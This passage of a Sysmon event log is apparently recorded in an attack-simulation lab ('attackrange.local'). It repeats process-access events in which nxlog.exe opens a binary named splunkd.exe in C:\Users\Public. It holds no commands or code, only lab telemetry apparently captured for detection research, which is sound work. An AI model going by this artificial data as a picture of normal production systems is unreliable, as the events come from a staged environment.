06:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6464,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:08.543\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:08.543","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6465,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:09.543\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:09.543","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6466,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:10.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:10.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6467,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:11.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:11.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6468,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:12.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:12.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6469,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:13.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:13.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6470,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:14.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 